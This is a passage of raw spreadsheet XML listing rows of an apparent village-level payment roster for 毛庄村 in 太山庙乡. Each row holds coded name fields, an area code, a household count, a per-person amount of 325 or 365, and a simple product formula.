      </c>
      <c r="B2166" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2166" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2166" s="17" t="s">
        <v>5720</v>
      </c>
      <c r="E2166" s="17" t="s">
        <v>5468</v>
      </c>
      <c r="F2166" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2166" s="17">
        <v>2</v>
      </c>
      <c r="H2166" s="18">
        <v>325</v>
      </c>
      <c r="I2166" s="17">
        <f>H2166*G2166</f>
        <v>650</v>
      </c>
      <c r="J2166" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2166" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2167" customHeight="1" spans="1:11">
      <c r="A2167" s="16" t="s">
        <v>5721</v>
      </c>
      <c r="B2167" s="17" t="str">
        <f>B2166</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2167" s="17" t="str">
        <f>C2166</f>
        <v>毛庄村</v>
      </c>
      <c r="D2167" s="16" t="s">
        <v>5722</v>
      </c>
      <c r="E2167" s="16" t="s">
        <v>5723</v>
      </c>
      <c r="F2167" s="17">
        <f>F2166</f>
        <v>4113210704</v>
      </c>
      <c r="G2167" s="17"/>
      <c r="H2167" s="17"/>
      <c r="I2167" s="17"/>
      <c r="J2167" s="17"/>
      <c r="K2167" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2168" customHeight="1" spans="1:11">
      <c r="A2168" s="16" t="s">
        <v>5724</v>
      </c>
      <c r="B2168" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2168" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2168" s="17" t="s">
        <v>5725</v>
      </c>
      <c r="E2168" s="17" t="s">
        <v>5726</v>
      </c>
      <c r="F2168" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2168" s="17">
        <v>2</v>
      </c>
      <c r="H2168" s="18">
        <v>325</v>
      </c>
      <c r="I2168" s="17">
        <f>H2168*G2168</f>
        <v>650</v>
      </c>
      <c r="J2168" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2168" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2169" customHeight="1" spans="1:11">
      <c r="A2169" s="16" t="s">
        <v>5727</v>
      </c>
      <c r="B2169" s="17" t="str">
        <f>B2168</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2169" s="17" t="str">
        <f>C2168</f>
        <v>毛庄村</v>
      </c>
      <c r="D2169" s="16" t="s">
        <v>5728</v>
      </c>
      <c r="E2169" s="16" t="s">
        <v>5729</v>
      </c>
      <c r="F2169" s="17">
        <f>F2168</f>
        <v>4113210704</v>
      </c>
      <c r="G2169" s="17"/>
      <c r="H2169" s="17"/>
      <c r="I2169" s="17"/>
      <c r="J2169" s="17"/>
      <c r="K2169" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2170" customHeight="1" spans="1:11">
      <c r="A2170" s="16" t="s">
        <v>5730</v>
      </c>
      <c r="B2170" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2170" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2170" s="17" t="s">
        <v>5731</v>
      </c>
      <c r="E2170" s="17" t="s">
        <v>5516</v>
      </c>
      <c r="F2170" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2170" s="17">
        <v>2</v>
      </c>
      <c r="H2170" s="18">
        <v>325</v>
      </c>
      <c r="I2170" s="17">
        <f>H2170*G2170</f>
        <v>650</v>
      </c>
      <c r="J2170" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2170" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2171" customHeight="1" spans="1:11">
      <c r="A2171" s="16" t="s">
        <v>5732</v>
      </c>
      <c r="B2171" s="17" t="str">
        <f>B2170</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2171" s="17" t="str">
        <f>C2170</f>
        <v>毛庄村</v>
      </c>
      <c r="D2171" s="16" t="s">
        <v>5733</v>
      </c>
      <c r="E2171" s="16" t="s">
        <v>5734</v>
      </c>
      <c r="F2171" s="17">
        <f>F2170</f>
        <v>4113210704</v>
      </c>
      <c r="G2171" s="17"/>
      <c r="H2171" s="17"/>
      <c r="I2171" s="17"/>
      <c r="J2171" s="17"/>
      <c r="K2171" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2172" customHeight="1" spans="1:11">
      <c r="A2172" s="16" t="s">
        <v>5735</v>
      </c>
      <c r="B2172" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2172" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2172" s="17" t="s">
        <v>5736</v>
      </c>
      <c r="E2172" s="17" t="s">
        <v>5563</v>
      </c>
      <c r="F2172" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2172" s="17">
        <v>2</v>
      </c>
      <c r="H2172" s="18">
        <v>325</v>
      </c>
      <c r="I2172" s="17">
        <f>H2172*G2172</f>
        <v>650</v>
      </c>
      <c r="J2172" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2172" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2173" customHeight="1" spans="1:11">
      <c r="A2173" s="16" t="s">
        <v>5737</v>
      </c>
      <c r="B2173" s="17" t="str">
        <f>B2172</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2173" s="17" t="str">
        <f>C2172</f>
        <v>毛庄村</v>
      </c>
      <c r="D2173" s="16" t="s">
        <v>5738</v>
      </c>
      <c r="E2173" s="25" t="s">
        <v>5566</v>
      </c>
      <c r="F2173" s="17">
        <f>F2172</f>
        <v>4113210704</v>
      </c>
      <c r="G2173" s="17"/>
      <c r="H2173" s="17"/>
      <c r="I2173" s="17"/>
      <c r="J2173" s="17"/>
      <c r="K2173" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2174" customHeight="1" spans="1:11">
      <c r="A2174" s="16" t="s">
        <v>5739</v>
      </c>
      <c r="B2174" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2174" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2174" s="17" t="s">
        <v>5740</v>
      </c>
      <c r="E2174" s="17" t="s">
        <v>5741</v>
      </c>
      <c r="F2174" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2174" s="17">
        <v>1</v>
      </c>
      <c r="H2174" s="18">
        <v>365</v>
      </c>
      <c r="I2174" s="17">
        <f t="shared" ref="I2174:I2181" si="104">H2174*G2174</f>
        <v>365</v>
      </c>
      <c r="J2174" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2174" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2175" customHeight="1" spans="1:11">
      <c r="A2175" s="16" t="s">
        <v>5742</v>
      </c>
      <c r="B2175" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2175" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2175" s="17" t="s">
        <v>5743</v>
      </c>
      <c r="E2175" s="17" t="s">
        <v>5042</v>
      </c>
      <c r="F2175" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2175" s="17">
        <v>1</v>
      </c>
      <c r="H2175" s="18">
        <v>365</v>
      </c>
      <c r="I2175" s="17">
        <f t="shared" si="104"/>
        <v>365</v>
      </c>
      <c r="J2175" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2175" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2176" customHeight="1" spans="1:11">
      <c r="A2176" s="16" t="s">
        <v>5744</v>
      </c>
      <c r="B2176" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2176" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2176" s="17" t="s">
        <v>5745</v>
      </c>
      <c r="E2176" s="17" t="s">
        <v>5696</v>
      </c>
      <c r="F2176" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2176" s="17">
        <v>1</v>
      </c>
      <c r="H2176" s="18">
        <v>365</v>
      </c>
      <c r="I2176" s="17">
        <f t="shared" si="104"/>
        <v>365</v>
      </c>
      <c r="J2176" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2176" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2177" customHeight="1" spans="1:11">
      <c r="A2177" s="16" t="s">
        <v>5746</v>
      </c>
      <c r="B2177" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2177" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2177" s="17" t="s">
        <v>5747</v>
      </c>
      <c r="E2177" s="17" t="s">
        <v>5465</v>
      </c>
      <c r="F2177" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2177" s="17">
        <v>1</v>
      </c>
      <c r="H2177" s="18">
        <v>365</v>
      </c>
      <c r="I2177" s="17">
        <f t="shared" si="104"/>
        <v>365</v>
      </c>
      <c r="J2177" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2177" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2178" customHeight="1" spans="1:11">
      <c r="A2178" s="16" t="s">
        <v>5748</v>
      </c>
      <c r="B2178" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2178" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2178" s="17" t="s">
        <v>5749</v>
      </c>
      <c r="E2178" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2178" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2178" s="17">
        <v>1</v>
      </c>
      <c r="H2178" s="18">
        <v>365</v>
      </c>
      <c r="I2178" s="17">
        <f t="shared" si="104"/>
        <v>365</v>
      </c>
      <c r="J2178" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2178" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2179" customHeight="1" spans="1:11">
      <c r="A2179" s="16" t="s">
        <v>5750</v>
      </c>
      <c r="B2179" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2179" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2179" s="17" t="s">
        <v>5751</v>
      </c>
      <c r="E2179" s="17" t="s">
        <v>5496</v>
      </c>
      <c r="F2179" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2179" s="17">
        <v>1</v>
      </c>
      <c r="H2179" s="18">
        <v>365</v>
      </c>
      <c r="I2179" s="17">
        <f t="shared" si="104"/>
        <v>365</v>
      </c>
      <c r="J2179" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2179" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2180" customHeight="1" spans="1:11">
      <c r="A2180" s="16" t="s">
        <v>5752</v>
      </c>
      <c r="B2180" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2180" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2180" s="17" t="s">
        <v>5753</v>
      </c>
      <c r="E2180" s="17" t="s">
        <v>5493</v>
      </c>
      <c r="F2180" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2180" s="17">
        <v>1</v>
      </c>
      <c r="H2180" s="18">
        <v>365</v>
      </c>
      <c r="I2180" s="17">
        <f t="shared" si="104"/>
        <v>365</v>
      </c>
      <c r="J2180" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2180" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2181" customHeight="1" spans="1:11">
      <c r="A2181" s="16" t="s">
        <v>5754</v>
      </c>
      <c r="B2181" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2181" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2181" s="17" t="s">
        <v>5755</v>
      </c>
      <c r="E2181" s="17" t="s">
        <v>2235</v>
      </c>
      <c r="F2181" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2181" s="17">
        <v>2</v>
      </c>
      <c r="H2181" s="18">
        <v>325</v>
      </c>
      <c r="I2181" s="17">
        <f t="shared" si="104"/>
        <v>650</v>
      </c>
      <c r="J2181" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2181" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2182" customHeight="1" spans="1:11">
      <c r="A2182" s="16" t="s">
        <v>5756</v>
      </c>
      <c r="B2182" s="17" t="str">
        <f>B2181</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2182" s="17" t="str">
        <f>C2181</f>
        <v>毛庄村</v>
      </c>
      <c r="D2182" s="16" t="s">
        <v>5757</v>
      </c>
      <c r="E2182" s="16" t="s">
        <v>5426</v>
      </c>
      <c r="F2182" s="17">
        <f>F2181</f>
        <v>4113210704</v>
      </c>
      <c r="G2182" s="17"/>
      <c r="H2182" s="17"/>
      <c r="I2182" s="17"/>
      <c r="J2182" s="17"/>
      <c r="K2182" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2183" customHeight="1" spans="1:11">
      <c r="A2183" s="16" t="s">
        <v>5758</v>
      </c>
      <c r="B2183" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2183" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2183" s="17" t="s">
        <v>5759</v>
      </c>
      <c r="E2183" s="17" t="s">
        <v>5539</v>
      </c>
      <c r="F2183" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2183" s="17">
        <v>2</v>
      </c>
      <c r="H2183" s="18">
        <v>325</v>
      </c>
      <c r="I2183" s="17">
        <f>H2183*G2183</f>
        <v>650</v>
      </c>
      <c r="J2183" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2183" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2184" customHeight="1" spans="1:11">
      <c r="A2184" s="16" t="s">
        <v>5760</v>
      </c>
      <c r="B2184" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2184" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2184" s="17" t="s">
        <v>5761</v>
      </c>
      <c r="E2184" s="17" t="s">
        <v>5465</v>
      </c>
      <c r="F2184" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2184" s="17"/>
      <c r="I2184" s="17"/>
      <c r="J2184" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2184" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2185" customHeight="1" spans="1:11">
      <c r="A2185" s="16" t="s">
        <v>5762</v>
      </c>
      <c r="B2185" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2185" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2185" s="17" t="s">
        <v>5763</v>
      </c>
      <c r="E2185" s="17" t="s">
        <v>5449</v>
      </c>
      <c r="F2185" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2185" s="17">
        <v>2</v>
      </c>
      <c r="H2185" s="18">
        <v>325</v>
      </c>
      <c r="I2185" s="17">
        <f>H2185*G2185</f>
        <v>650</v>
      </c>
      <c r="J2185" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2185" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2186" customHeight="1" spans="1:11">
      <c r="A2186" s="16" t="s">
        <v>5764</v>
      </c>
      <c r="B2186" s="17" t="str">
        <f>B2185</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2186" s="17" t="str">
        <f>C2185</f>
        <v>毛庄村</v>
      </c>
      <c r="D2186" s="16" t="s">
        <v>5765</v>
      </c>
      <c r="E2186" s="16" t="s">
        <v>5401</v>
      </c>
      <c r="F2186" s="17">
        <f>F2185</f>
        <v>4113210704</v>
      </c>
      <c r="G2186" s="17"/>
      <c r="H2186" s="17"/>
      <c r="I2186" s="17"/>
      <c r="J2186" s="17"/>
      <c r="K2186" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2187" customHeight="1" spans="1:11">
      <c r="A2187" s="16" t="s">
        <v>5766</v>
      </c>
      <c r="B2187" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2187" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2187" s="17" t="s">
        <v>5767</v>
      </c>
      <c r="E2187" s="17" t="s">
        <v>5506</v>
      </c>
      <c r="F2187" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2187" s="17">
        <v>1</v>
      </c>
      <c r="H2187" s="18">
        <v>365</v>
      </c>
      <c r="I2187" s="17">
        <f>H2187*G2187</f>
        <v>365</v>
      </c>
      <c r="J2187" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2187" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2188" customHeight="1" spans="1:11">
      <c r="A2188" s="16" t="s">
        <v>5768</v>
      </c>
      <c r="B2188" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2188" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2188" s="17" t="s">
        <v>5769</v>
      </c>
      <c r="E2188" s="17" t="s">
        <v>5506</v>
      </c>
      <c r="F2188" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2188" s="17">
        <v>2</v>
      </c>
      <c r="H2188" s="18">
        <v>325</v>
      </c>
      <c r="I2188" s="17">
        <f>H2188*G2188</f>
        <v>650</v>
      </c>
      <c r="J2188" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2188" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2189" customHeight="1" spans="1:11">
      <c r="A2189" s="16" t="s">
        <v>5770</v>
      </c>
      <c r="B2189" s="17" t="str">
        <f>B2188</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2189" s="17" t="str">
        <f>C2188</f>
        <v>毛庄村</v>
      </c>
      <c r="D2189" s="16" t="s">
        <v>5771</v>
      </c>
      <c r="E2189" s="16" t="s">
        <v>5550</v>
      </c>
      <c r="F2189" s="17">
        <f>F2188</f>
        <v>4113210704</v>
      </c>
      <c r="G2189" s="17"/>
      <c r="H2189" s="17"/>
      <c r="I2189" s="17"/>
      <c r="J2189" s="17"/>
      <c r="K2189" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2190" customHeight="1" spans="1:11">
      <c r="A2190" s="16" t="s">
        <v>5772</v>
      </c>
      <c r="B2190" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2190" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2190" s="17" t="s">
        <v>5773</v>
      </c>
      <c r="E2190" s="17" t="s">
        <v>5525</v>
      </c>
      <c r="F2190" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2190" s="17">
        <v>2</v>
      </c>
      <c r="H2190" s="18">
        <v>325</v>
      </c>
      <c r="I2190" s="17">
        <f>H2190*G2190</f>
        <v>650</v>
      </c>
      <c r="J2190" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2190" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2191" customHeight="1" spans="1:11">
      <c r="A2191" s="16" t="s">
        <v>5774</v>
      </c>
      <c r="B2191" s="17" t="str">
        <f>B2190</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2191" s="17" t="str">
        <f>C2190</f>
        <v>毛庄村</v>
      </c>
      <c r="D2191" s="16" t="s">
        <v>5775</v>
      </c>
      <c r="E2191" s="16" t="s">
        <v>5776</v>
      </c>
      <c r="F2191" s="17">
        <f>F2190</f>
        <v>4113210704</v>
      </c>
      <c r="G2191" s="17"/>
      <c r="H2191" s="17"/>
      <c r="I2191" s="17"/>
      <c r="J2191" s="17"/>
      <c r="K2191" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2192" customHeight="1" spans="1:11">
      <c r="A2192" s="16" t="s">
        <v>5777</v>
      </c>
      <c r="B2192" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2192" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2192" s="17" t="s">
        <v>5778</v>
      </c>
      <c r="E2192" s="17" t="s">
        <v>5779</v>
      </c>
      <c r="F2192" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2192" s="17">
        <v>1</v>
      </c>
      <c r="H2192" s="18">
        <v>365</v>
      </c>
      <c r="I2192" s="17">
        <f>H2192*G2192</f>
        <v>365</v>
      </c>
      <c r="J2192" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2192" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2193" customHeight="1" spans="1:11">
      <c r="A2193" s="16" t="s">
        <v>5780</v>
      </c>
      <c r="B2193" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2193" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2193" s="17" t="s">
        <v>5781</v>
      </c>
      <c r="E2193" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F2193" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2193" s="17">
        <v>1</v>
      </c>
      <c r="H2193" s="18">
        <v>365</v>
      </c>
      <c r="I2193" s="17">
        <f>H2193*G2193</f>
        <v>365</v>
      </c>
      <c r="J2193" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2193" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2194" customHeight="1" spans="1:11">
      <c r="A2194" s="16" t="s">
        <v>5782</v>
      </c>
      <c r="B2194" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2194" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2194" s="17" t="s">
        <v>5783</v>
      </c>
      <c r="E2194" s="17" t="s">
        <v>5784</v>
      </c>
      <c r="F2194" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2194" s="17">
        <v>1</v>
      </c>
      <c r="H2194" s="18">
        <v>365</v>
      </c>
      <c r="I2194" s="17">
        <f>H2194*G2194</f>
        <v>365</v>
      </c>
      <c r="J2194" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2194" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2195" customHeight="1" spans="1:11">
      <c r="A2195" s="16" t="s">
        <v>5785</v>
      </c>
      <c r="B2195" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2195" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2195" s="17" t="s">
        <v>5531</v>
      </c>
      <c r="E2195" s="17" t="s">
        <v>5532</v>
      </c>
      <c r="F2195" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2195" s="17">
        <v>1</v>
      </c>
      <c r="H2195" s="18">
        <v>365</v>
      </c>
      <c r="I2195" s="17">
        <f>H2195*G2195</f>
        <v>365</v>
      </c>
      <c r="J2195" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2195" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2196" customHeight="1" spans="1:11">
      <c r="A2196" s="16" t="s">
        <v>5786</v>
      </c>
      <c r="B2196" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2196" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2196" s="17" t="s">
        <v>5787</v>
      </c>
      <c r="E2196" s="17" t="s">
        <v>5499</v>
      </c>
      <c r="F2196" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2196" s="17">
        <v>1</v>
      </c>
      <c r="H2196" s="18">
        <v>365</v>
      </c>
      <c r="I2196" s="17">
        <f>H2196*G2196</f>
        <v>365</v>
      </c>
      <c r="J2196" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2196" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2197" customHeight="1" spans="1:11">
      <c r="A2197" s="16" t="s">
        <v>5788</v>
      </c>
      <c r="B2197" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2197" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2197" s="17" t="s">
        <v>5789</v>
      </c>
      <c r="E2197" s="17" t="s">
        <v>5660</v>
      </c>
      <c r="F2197" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2197" s="17">
        <v>2</v>
      </c>
      <c r="H2197" s="18">
        <v>325</v>
      </c>
      <c r="I2197" s="17">
        <f t="shared" ref="I2197:I2204" si="105">H2197*G2197</f>
        <v>650</v>
      </c>
      <c r="J2197" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2197" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2198" customHeight="1" spans="1:11">
      <c r="A2198" s="16" t="s">
        <v>5790</v>
      </c>
      <c r="B2198" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2198" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2198" s="17" t="s">
        <v>5791</v>
      </c>
      <c r="E2198" s="17" t="s">
        <v>5513</v>
      </c>
      <c r="F2198" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2198" s="17"/>
      <c r="I2198" s="17"/>
      <c r="J2198" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2198" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2199" customHeight="1" spans="1:11">
      <c r="A2199" s="16" t="s">
        <v>5792</v>
      </c>
      <c r="B2199" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2199" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2199" s="17" t="s">
        <v>5793</v>
      </c>
      <c r="E2199" s="17" t="s">
        <v>3935</v>
      </c>
      <c r="F2199" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2199" s="17">
        <v>1</v>
      </c>
      <c r="H2199" s="18">
        <v>365</v>
      </c>
      <c r="I2199" s="17">
        <f t="shared" ref="I2199:I2204" si="106">H2199*G2199</f>
        <v>365</v>
      </c>
      <c r="J2199" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2199" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2200" customHeight="1" spans="1:11">
      <c r="A2200" s="16" t="s">
        <v>5794</v>
      </c>
      <c r="B2200" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2200" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2200" s="17" t="s">
        <v>5795</v>
      </c>
      <c r="E2200" s="17" t="s">
        <v>5431</v>
      </c>
      <c r="F2200" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2200" s="17">
        <v>1</v>
      </c>
      <c r="H2200" s="18">
        <v>365</v>
      </c>
      <c r="I2200" s="17">
        <f t="shared" si="106"/>
        <v>365</v>
      </c>
      <c r="J2200" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2200" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2201" customHeight="1" spans="1:11">
      <c r="A2201" s="16" t="s">
        <v>5796</v>
      </c>
      <c r="B2201" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2201" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2201" s="17" t="s">
        <v>5797</v>
      </c>
      <c r="E2201" s="17" t="s">
        <v>5426</v>
      </c>
      <c r="F2201" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2201" s="17">
        <v>1</v>
      </c>
      <c r="H2201" s="18">
        <v>365</v>
      </c>
      <c r="I2201" s="17">
        <f t="shared" si="106"/>
        <v>365</v>
      </c>
      <c r="J2201" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2201" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2202" customHeight="1" spans="1:11">
      <c r="A2202" s="16" t="s">
        <v>5798</v>
      </c>
      <c r="B2202" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2202" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2202" s="17" t="s">
        <v>5799</v>
      </c>
      <c r="E2202" s="17" t="s">
        <v>5525</v>
      </c>
      <c r="F2202" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2202" s="17">
        <v>1</v>
      </c>
      <c r="H2202" s="18">
        <v>365</v>
      </c>
      <c r="I2202" s="17">
        <f t="shared" si="106"/>
        <v>365</v>
      </c>
      <c r="J2202" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2202" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2203" customHeight="1" spans="1:11">
      <c r="A2203" s="16" t="s">
        <v>5800</v>
      </c>
      <c r="B2203" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2203" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2203" s="17" t="s">
        <v>5801</v>
      </c>
      <c r="E2203" s="17" t="s">
        <v>5802</v>
      </c>
      <c r="F2203" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2203" s="17">
        <v>1</v>
      </c>
      <c r="H2203" s="18">
        <v>365</v>
      </c>
      <c r="I2203" s="17">
        <f t="shared" si="106"/>
        <v>365</v>
      </c>
      <c r="J2203" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2203" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2204" customHeight="1" spans="1:11">
      <c r="A2204" s="16" t="s">
        <v>5803</v>
      </c>
      <c r="B2204" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2204" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2204" s="17" t="s">
        <v>5804</v>
      </c>
      <c r="E2204" s="17" t="s">
        <v>5805</v>
      </c>
      <c r="F2204" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2204" s="17">
        <v>2</v>
      </c>
      <c r="H2204" s="18">
        <v>325</v>
      </c>
      <c r="I2204" s="17">
        <f t="shared" si="106"/>
        <v>650</v>
      </c>
      <c r="J2204" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2204" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2205" customHeight="1" spans="1:11">
      <c r="A2205" s="16" t="s">
        <v>5806</v>
      </c>
      <c r="B2205" s="17" t="str">
        <f>B2204</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2205" s="17" t="str">
        <f>C2204</f>
        <v>毛庄村</v>
      </c>
      <c r="D2205" s="16" t="s">
        <v>5807</v>
      </c>
      <c r="E2205" s="16" t="s">
        <v>5660</v>
      </c>
      <c r="F2205" s="17">
        <f>F2204</f>
